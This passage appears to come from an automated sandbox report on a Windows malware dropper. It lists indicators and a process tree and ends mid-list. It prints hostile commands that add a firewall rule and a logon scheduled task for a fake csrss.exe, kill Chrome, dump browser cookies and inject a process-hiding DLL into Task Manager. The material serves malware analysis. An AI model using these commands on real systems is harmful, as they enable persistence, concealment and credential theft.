Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	Graphics.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exe

pid	process
2156	pub2.exe
2156	pub2.exe
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
2964
3624	jfiag3g_gg.exe
3624	jfiag3g_gg.exe
2964
2964
2964
2964

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

2156 pub2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exetaskkill.exemd9_1sjm.exe

description	pid	process
Token: SeDebugPrivilege	3988	SoCleanInst.exe
Token: SeCreateTokenPrivilege	3980	Install.exe
Token: SeAssignPrimaryTokenPrivilege	3980	Install.exe
Token: SeLockMemoryPrivilege	3980	Install.exe
Token: SeIncreaseQuotaPrivilege	3980	Install.exe
Token: SeMachineAccountPrivilege	3980	Install.exe
Token: SeTcbPrivilege	3980	Install.exe
Token: SeSecurityPrivilege	3980	Install.exe
Token: SeTakeOwnershipPrivilege	3980	Install.exe
Token: SeLoadDriverPrivilege	3980	Install.exe
Token: SeSystemProfilePrivilege	3980	Install.exe
Token: SeSystemtimePrivilege	3980	Install.exe
Token: SeProfSingleProcessPrivilege	3980	Install.exe
Token: SeIncBasePriorityPrivilege	3980	Install.exe
Token: SeCreatePagefilePrivilege	3980	Install.exe
Token: SeCreatePermanentPrivilege	3980	Install.exe
Token: SeBackupPrivilege	3980	Install.exe
Token: SeRestorePrivilege	3980	Install.exe
Token: SeShutdownPrivilege	3980	Install.exe
Token: SeDebugPrivilege	3980	Install.exe
Token: SeAuditPrivilege	3980	Install.exe
Token: SeSystemEnvironmentPrivilege	3980	Install.exe
Token: SeChangeNotifyPrivilege	3980	Install.exe
Token: SeRemoteShutdownPrivilege	3980	Install.exe
Token: SeUndockPrivilege	3980	Install.exe
Token: SeSyncAgentPrivilege	3980	Install.exe
Token: SeEnableDelegationPrivilege	3980	Install.exe
Token: SeManageVolumePrivilege	3980	Install.exe
Token: SeImpersonatePrivilege	3980	Install.exe
Token: SeCreateGlobalPrivilege	3980	Install.exe
Token: 31	3980	Install.exe
Token: 32	3980	Install.exe
Token: 33	3980	Install.exe
Token: 34	3980	Install.exe
Token: 35	3980	Install.exe
Token: SeDebugPrivilege	3832	taskkill.exe
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeManageVolumePrivilege	3788	md9_1sjm.exe
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964
Token: SeCreatePagefilePrivilege	2964
Token: SeShutdownPrivilege	2964

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

6l_6TITW6M_FWNyv9JNJWShr.exeEDUEUo_d_qvXV91VWNI_Kecc.exeycbHgGGWAHdsFMky2Z4JvH4A.exeEbCMBNv6S7MFZ2OS3eEGYonW.exepZtyZVslug6pQkXi0VFh4_wm.exe95GYtErt11V9BcYEb0FsRiir.exeEaazESuGFEPWgefydKJP1kcG.exe

pid	process
1180	6l_6TITW6M_FWNyv9JNJWShr.exe
528	EDUEUo_d_qvXV91VWNI_Kecc.exe
1616	ycbHgGGWAHdsFMky2Z4JvH4A.exe
3548	EbCMBNv6S7MFZ2OS3eEGYonW.exe
1408	pZtyZVslug6pQkXi0VFh4_wm.exe
2848	95GYtErt11V9BcYEb0FsRiir.exe
2444	EaazESuGFEPWgefydKJP1kcG.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exeFolder.exerUNdlL32.eXeFiles.exeInstall.execmd.exesvchost.exeGraphics.execmd.execsrss.exeFile.exe

description	pid	process	target process
PID 4048 wrote to memory of 3988	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	SoCleanInst.exe
PID 4048 wrote to memory of 3988	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	SoCleanInst.exe
PID 4048 wrote to memory of 3788	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	md9_1sjm.exe
PID 4048 wrote to memory of 3788	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	md9_1sjm.exe
PID 4048 wrote to memory of 3788	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	md9_1sjm.exe
PID 4048 wrote to memory of 432	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Folder.exe
PID 4048 wrote to memory of 432	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Folder.exe
PID 4048 wrote to memory of 432	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Folder.exe
PID 4048 wrote to memory of 3036	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Graphics.exe
PID 4048 wrote to memory of 3036	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Graphics.exe
PID 4048 wrote to memory of 3036	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Graphics.exe
PID 4048 wrote to memory of 2984	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Updbdate.exe
PID 4048 wrote to memory of 2984	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Updbdate.exe
PID 4048 wrote to memory of 2984	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Updbdate.exe
PID 432 wrote to memory of 3140	432	Folder.exe	Folder.exe
PID 432 wrote to memory of 3140	432	Folder.exe	Folder.exe
PID 432 wrote to memory of 3140	432	Folder.exe	Folder.exe
PID 4048 wrote to memory of 3980	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Install.exe
PID 4048 wrote to memory of 3980	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Install.exe
PID 4048 wrote to memory of 3980	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Install.exe
PID 4048 wrote to memory of 1196	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Files.exe
PID 4048 wrote to memory of 1196	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Files.exe
PID 4048 wrote to memory of 1196	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	Files.exe
PID 4048 wrote to memory of 2156	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	pub2.exe
PID 4048 wrote to memory of 2156	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	pub2.exe
PID 4048 wrote to memory of 2156	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	pub2.exe
PID 4048 wrote to memory of 3680	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	File.exe
PID 4048 wrote to memory of 3680	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	File.exe
PID 4048 wrote to memory of 3680	4048	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe	File.exe
PID 3164 wrote to memory of 2544	3164	rUNdlL32.eXe	rundll32.exe
PID 3164 wrote to memory of 2544	3164	rUNdlL32.eXe	rundll32.exe
PID 3164 wrote to memory of 2544	3164	rUNdlL32.eXe	rundll32.exe
PID 1196 wrote to memory of 800	1196	Files.exe	jfiag3g_gg.exe
PID 1196 wrote to memory of 800	1196	Files.exe	jfiag3g_gg.exe
PID 1196 wrote to memory of 800	1196	Files.exe	jfiag3g_gg.exe
PID 3980 wrote to memory of 2260	3980	Install.exe	cmd.exe
PID 3980 wrote to memory of 2260	3980	Install.exe	cmd.exe
PID 3980 wrote to memory of 2260	3980	Install.exe	cmd.exe
PID 2260 wrote to memory of 3832	2260	cmd.exe	taskkill.exe
PID 2260 wrote to memory of 3832	2260	cmd.exe	taskkill.exe
PID 2260 wrote to memory of 3832	2260	cmd.exe	taskkill.exe
PID 1196 wrote to memory of 3624	1196	Files.exe	jfiag3g_gg.exe
PID 1196 wrote to memory of 3624	1196	Files.exe	jfiag3g_gg.exe
PID 1196 wrote to memory of 3624	1196	Files.exe	jfiag3g_gg.exe
PID 1128 wrote to memory of 1792	1128	svchost.exe	Graphics.exe
PID 1128 wrote to memory of 1792	1128	svchost.exe	Graphics.exe
PID 1128 wrote to memory of 1792	1128	svchost.exe	Graphics.exe
PID 1792 wrote to memory of 3752	1792	Graphics.exe	cmd.exe
PID 1792 wrote to memory of 3752	1792	Graphics.exe	cmd.exe
PID 3752 wrote to memory of 3540	3752	cmd.exe	netsh.exe
PID 3752 wrote to memory of 3540	3752	cmd.exe	netsh.exe
PID 1792 wrote to memory of 2256	1792	Graphics.exe	csrss.exe
PID 1792 wrote to memory of 2256	1792	Graphics.exe	csrss.exe
PID 1792 wrote to memory of 2256	1792	Graphics.exe	csrss.exe
PID 1128 wrote to memory of 3832	1128	svchost.exe	schtasks.exe
PID 1128 wrote to memory of 3832	1128	svchost.exe	schtasks.exe
PID 2256 wrote to memory of 3744	2256	csrss.exe	injector.exe
PID 2256 wrote to memory of 3744	2256	csrss.exe	injector.exe
PID 3680 wrote to memory of 2384	3680	File.exe	h7o35csDp3T7opPTqKp4RhrO.exe
PID 3680 wrote to memory of 2384	3680	File.exe	h7o35csDp3T7opPTqKp4RhrO.exe
PID 3680 wrote to memory of 1180	3680	File.exe	6l_6TITW6M_FWNyv9JNJWShr.exe
PID 3680 wrote to memory of 1180	3680	File.exe	6l_6TITW6M_FWNyv9JNJWShr.exe
PID 3680 wrote to memory of 1180	3680	File.exe	6l_6TITW6M_FWNyv9JNJWShr.exe
PID 3680 wrote to memory of 528	3680	File.exe	EDUEUo_d_qvXV91VWNI_Kecc.exe

C:\Users\Admin\AppData\Local\Temp\8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe
"C:\Users\Admin\AppData\Local\Temp\8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4048

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3988

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:3788

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:432

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:3140

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
PID:3036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 328
3⤵
- Program crash
PID:432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 348
3⤵
- Program crash
PID:460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 348
3⤵
- Program crash
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 664
3⤵
- Program crash
PID:824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 660
3⤵
- Program crash
PID:1084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 660
3⤵
- Program crash
PID:432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 660
3⤵
- Program crash
PID:3540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 728
3⤵
- Program crash
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 752
3⤵
- Program crash
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 628
3⤵
- Program crash
PID:860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 708
3⤵
- Program crash
PID:2376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 868
3⤵
- Program crash
PID:1256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 888
3⤵
- Program crash
PID:1424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 912
3⤵
- Program crash
PID:3776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 888
3⤵
- Program crash
PID:456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 952
3⤵
- Program crash
PID:3832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 884
3⤵
- Program crash
PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 868
3⤵
- Program crash
PID:432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 688
3⤵
- Program crash
PID:2320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 600
3⤵
- Program crash
PID:1652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 912
3⤵
- Program crash
PID:1780

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 292
4⤵
- Program crash
PID:2308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 296
4⤵
- Program crash
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 296
4⤵
- Program crash
PID:1092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 636
4⤵
- Program crash
PID:1652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 636
4⤵
- Program crash
PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 636
4⤵
- Program crash
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 700
4⤵
- Program crash
PID:3164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 708
4⤵
- Program crash
PID:3540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 724
4⤵
- Program crash
PID:2376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 840
4⤵
- Program crash
PID:2264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 716
4⤵
- Program crash
PID:684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 868
4⤵
- Program crash
PID:2940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 660
4⤵
- Program crash
PID:1256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 868
4⤵
- Program crash
PID:1300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 748
4⤵
- Program crash
PID:3704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 860
4⤵
- Program crash
PID:3716

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:3752

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:3540

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 328
5⤵
- Program crash
PID:2408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 332
5⤵
- Program crash
PID:3280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 332
5⤵
- Program crash
PID:1424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 652
5⤵
- Program crash
PID:3580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 652
5⤵
- Program crash
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 652
5⤵
- Program crash
PID:2192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 652
5⤵
- Program crash
PID:2544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 728
5⤵
- Program crash
PID:864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 756
5⤵
- Program crash
PID:2444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 616
5⤵
- Program crash
PID:528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 668
5⤵
- Program crash
PID:2264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 708
5⤵
- Program crash
PID:444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 708
5⤵
- Program crash
PID:1908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 892
5⤵
- Program crash
PID:1336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 892
5⤵
- Program crash
PID:824

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:3832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 976
5⤵
- Program crash
PID:3708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 992
5⤵
- Program crash
PID:2848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 960
5⤵
- Program crash
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 1016
5⤵
- Program crash
PID:2192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 960
5⤵
- Program crash
PID:3640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 976
5⤵
- Program crash
PID:3036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 1016
5⤵
- Program crash
PID:2940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 1100
5⤵
- Program crash
PID:864

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:3744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 1096
5⤵
- Program crash
PID:444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 1008
5⤵
- Program crash
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 1100
5⤵
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 1008
5⤵
PID:4204

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:2984

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3832

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1196

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:800

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3624

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2156

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3680

C:\Users\Admin\Pictures\Adobe Films\h7o35csDp3T7opPTqKp4RhrO.exe
"C:\Users\Admin\Pictures\Adobe Films\h7o35csDp3T7opPTqKp4RhrO.exe"
3⤵
- Executes dropped EXE
PID:2384

C:\Users\Admin\Pictures\Adobe Films\EDUEUo_d_qvXV91VWNI_Kecc.exe
"C:\Users\Admin\Pictures\Adobe Films\EDUEUo_d_qvXV91VWNI_Kecc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:528

C:\Recovery\WindowsRE\95GYtErt11V9BcYEb0FsRiir.exe
"C:\Recovery\WindowsRE\95GYtErt11V9BcYEb0FsRiir.exe"
4⤵
PID:5224

C:\Users\Admin\Pictures\Adobe Films\ycbHgGGWAHdsFMky2Z4JvH4A.exe
"C:\Users\Admin\Pictures\Adobe Films\ycbHgGGWAHdsFMky2Z4JvH4A.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1616

C:\Users\Admin\Documents\zQ5Bhb_V9HGzFLClGAe52AxO.exe
"C:\Users\Admin\Documents\zQ5Bhb_V9HGzFLClGAe52AxO.exe"
4⤵
PID:3840

C:\Users\Admin\Pictures\Adobe Films\OywaXypGiO0AZny3wLeSbrsp.exe
"C:\Users\Admin\Pictures\Adobe Films\OywaXypGiO0AZny3wLeSbrsp.exe"
5⤵
PID:6140

C:\Users\Admin\Pictures\Adobe Films\UAiRXLgv8uXpsoHt3w3njaG_.exe
"C:\Users\Admin\Pictures\Adobe Films\UAiRXLgv8uXpsoHt3w3njaG_.exe"
5⤵
PID:4712

C:\Users\Admin\Pictures\Adobe Films\r1WqG75hpJbYvLBR5et7sPXS.exe
"C:\Users\Admin\Pictures\Adobe Films\r1WqG75hpJbYvLBR5et7sPXS.exe"
5⤵
PID:4488

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
6⤵
PID:4256

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
7⤵
PID:5684

C:\Users\Admin\Pictures\Adobe Films\z8k9klxtTXoVmXarIsf3By0P.exe
"C:\Users\Admin\Pictures\Adobe Films\z8k9klxtTXoVmXarIsf3By0P.exe"
5⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\7zSB3B3.tmp\Install.exe
.\Install.exe
6⤵
PID:3564

C:\Users\Admin\AppData\Local\Temp\7zSD4B9.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
PID:5736

C:\Users\Admin\Pictures\Adobe Films\MnKgDPXeaMlGhmqpdh2uOf6o.exe
"C:\Users\Admin\Pictures\Adobe Films\MnKgDPXeaMlGhmqpdh2uOf6o.exe"
5⤵
PID:5404

C:\Users\Admin\Pictures\Adobe Films\MvYNpcpUbuWOo4eGcuOSMBCw.exe
"C:\Users\Admin\Pictures\Adobe Films\MvYNpcpUbuWOo4eGcuOSMBCw.exe"
5⤵
PID:4664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 616
6⤵
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 656
6⤵
PID:5104

C:\Users\Admin\Pictures\Adobe Films\Arf8Oq9NAlwN9hToewahKzZd.exe
